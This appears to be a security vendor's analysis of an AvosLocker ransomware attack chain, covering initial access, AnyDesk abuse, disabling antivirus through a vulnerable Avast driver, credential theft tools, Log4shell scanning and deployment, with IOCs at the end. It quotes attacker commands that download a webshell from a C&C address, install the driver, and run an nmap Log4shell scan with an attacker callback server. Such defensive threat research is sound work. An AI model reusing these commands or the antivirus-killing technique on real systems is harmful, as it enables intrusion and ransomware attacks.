fig3-avoslocker-ransomware-disables-av-scans-log4shell
Figure 3. Remotely executing an HTA file from the C&C server. Screenshots taken from Trend Micro Vison One.
fig4-avoslocker-ransomware-disables-av-scans-log4shell
Figure 4. HTA file connecting to the C&C

A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file. The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.

fig5-avoslocker-ransomware-disables-av-scans-log4shell
Figure 5. Obfuscated PowerShell script contains a shellcode

The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe /c powershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide >. According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker. The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.

fig6-avoslocker-ransomware-disables-av-scans-log4shell
Figure 6. Gather system information

The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.

fig7-avoslocker-ransomware-disables-av-scans-log4shell
Figure 7. Executed with the /domain argument to collect username information
fig8-avoslocker-ransomware-disables-av-scans-log4shell
Figure 8. query user information for session data

The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.

fig9-avoslocker-ransomware-disables-av-scans-log4shell
Figure 9. The PowerShell downloading and installing AnyDeskMSI

We observed that a new user account was created, added to the current domain, and included in the administrator group. This ensures the attacker can have administrative rights to the infected system. The attackers also checked the running processes in the system via TaskList to check for anti-virus processes running in the infiltrated system.

fig10-avoslocker-ransomware-disables-av-scans-log4shell
Figure 10. Creating a new account with admin rights
fig11-avoslocker-ransomware-disables-av-scans-log4shell
Figure 11. Checking for anti-virus processes running

During the scan, we observed an attempt to terminate security products initiated via TaskKill. Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.

fig12-avoslocker-ransomware-disables-av-scans-log4shell
Figure 12. Terminating security products running

Tools and functions

Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products. The tools transferred using AnyDesk are:

  • Netscan: To scan for other endpoints
  • Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints
  • Hacking tools Mimikatz and Impacket: For lateral movement
  • PDQ deploy: For mass deployment of malicious script to multiple endpoints
  • Aswarpot.sys: For disabling defense solutions. We noted that it can disable a number of anti-virus products, previously identified by Aon’s researchers.
fig13-avoslocker-ransomware-disables-av-scans-log4shell
Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk

We found an Avast anti-rootkit driver installed as service ‘asWarPot.sys’ using the command sc.exe  create aswSP_ArPot2 binPath= C:\windows\aswArPot.sys type= kernel. It installs the driver file in preparation for disabling the running anti-virus product. We noted the unusual use of cmd.exe for execution of the file.  

fig14-avoslocker-ransomware-disables-av-scans-log4shell
Figure 14. Executing the anti-rootkit driver in the system

Mimikatz components were also copied to the affected machine via AnyDeskMSI. However, these components were detected and deleted.

fig15-avoslocker-ransomware-disables-av-scans-log4shell
Figure 15. Detecting and deleting Mimikatz

We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver). A list of security product processes was supplied and subsequently terminated by the driver.

fig16-avoslocker-ransomware-disables-av-scans-log4shell
Figure 16. Listing and terminating the security products found running in the compromised system

Verification: Manual replication of anti-virus disabling routine

We manually replicated the routine and commands for disabling the defense solutions to further look into the routine. Figure 17 shows the list of processes that the routine searches on infection :

  • EndpointBasecamp.exe
  • Trend Micro Endpoint Basecamp
  • ResponseService.exe
  • PccNTMon.exe
  • SupportConnector.exe
  • AOTAgent.exe
  • CETASvc.exe
  • CETASvc
  • iVPAgent.exe
  • tmwscsvc.exe
  • TMResponse
  • AOTAgentSvc
  • TMBMServer
  • iVPAgent
  • Trend Micro Web Service Communicator
  • Tmccsf
  • Tmlisten
  • Ntrtscan
  • TmWSCSvc
fig17-avoslocker-ransomware-disables-av-scans-log4shell
Figure 17. Searching for processes

We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.

fig18-avoslocker-ransomware-disables-av-scans-log4shell
Figure 18. Driver file preparing to disable an anti-virus product

The DeviceIoControl function is used to execute parts of the driver. In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above. Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.

fig19-avoslocker-ransomware-disables-av-scans-log4shell
Figure 19. DeviceIoControl as an argument with the current process ID

Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case. Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.

fig20-avoslocker-ransomware-disables-av-scans-log4shell
Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).

Other executions and lateral movement

After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.

fig21-avoslocker-ransomware-disables-av-scans-log4shell
Figure 21. Execution of Mimikatz (above) and Impacket via C:\temp\wmiexec.exe (below)

We also observed the execution of a password recovery tool XenArmor with C:\temp\pass\start.exe.

fig22-avoslocker-ransomware-disables-av-scans-log4shell
Figure 22. XenArmor password recovery tool execution

We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network. They used the command nmap  –script log4shell.nse –script-args log4shell.waf-bypass=true –script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set the callback server to the attacker group C&C server. 

fig23-avoslocker-ransomware-disables-av-scans-log4shell
Figure 23. Checking for log4shell

We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available endpoints.

fig24-avoslocker-ransomware-disables-av-scans-log4shell
Figure 24. Running more system network configuration discovery scans

Deploying across the network

We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.

fig25-avoslocker-ransomware-disables-av-scans-log4shell
Figure 25. Deploying malicious batch scripts to other endpoints

The deployed batch script has the following commands:

  • Disable Windows Update and Microsoft Defender
fig26-avoslocker-ransomware-disables-av-scans-log4shell
Figure 26. Disable Microsoft defense services
  • Prevents safeboot execution of security products
fig27-avoslocker-ransomware-disables-av-scans-log4shell
Figure 27. Prevent security products’ execution
  • Create new administrator account
fig28-avoslocker-ransomware-disables-av-scans-log4shell
Figure 28. Create new account
  • Add the AutoStart mechanism for the AvosLocker executable (update.exe)
fig29-avoslocker-ransomware-disables-av-scans-log4shell
Figure 29. Add Autostart for ransomware executable
  • Disables legal notice caption
fig30-avoslocker-ransomware-disables-av-scans-log4shell
Figure 30. Disable legal notice
  • Set safeboot with networking and disables Windows Error Recovery and reboot
fig31-avoslocker-ransomware-disables-av-scans-log4shell
Figure 31. Setting and disabling network and specific Windows functions

Conclusion

While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).

This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice. Other modern ransomware, such as Mespinoza/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.

Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks. Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence grows in sophistication. In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.

However, and specific to this instance, the attempt to kill an anti-virus product such as this variant’s TaskKill can also be foiled. In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine. The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.

Avast responded to our notification with this statement:

“We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021. We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can’t be loaded to memory.

The below example shows that the blocking works (output from the “sc start” command):

               (SC) StartService FAILED 1275:

               This driver has been blocked from loading

The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft’s security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.

All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.

For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program.”

Indicators of Compromise (IOCs) 

FileSHA256Detection
Malicious batch file componenta5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15Trojan.BAT.KILLAV.YACAA
AvosLocker executable05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5Ransom.Win32.AVOSLOCKER.SMYXBLNT
Mimikatz executable (x32 and x64)912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9HackTool.Win64.MIMIKATZ.ZTJA
e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98HackTool.Win32.Mimikatz.CNFW
Log4shell Nmap NSE scriptddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96Backdoor.Win32.CVE202144228.YACAH
Impacket tool14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8HackTool.Win32.Impacket.AA

Source :
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html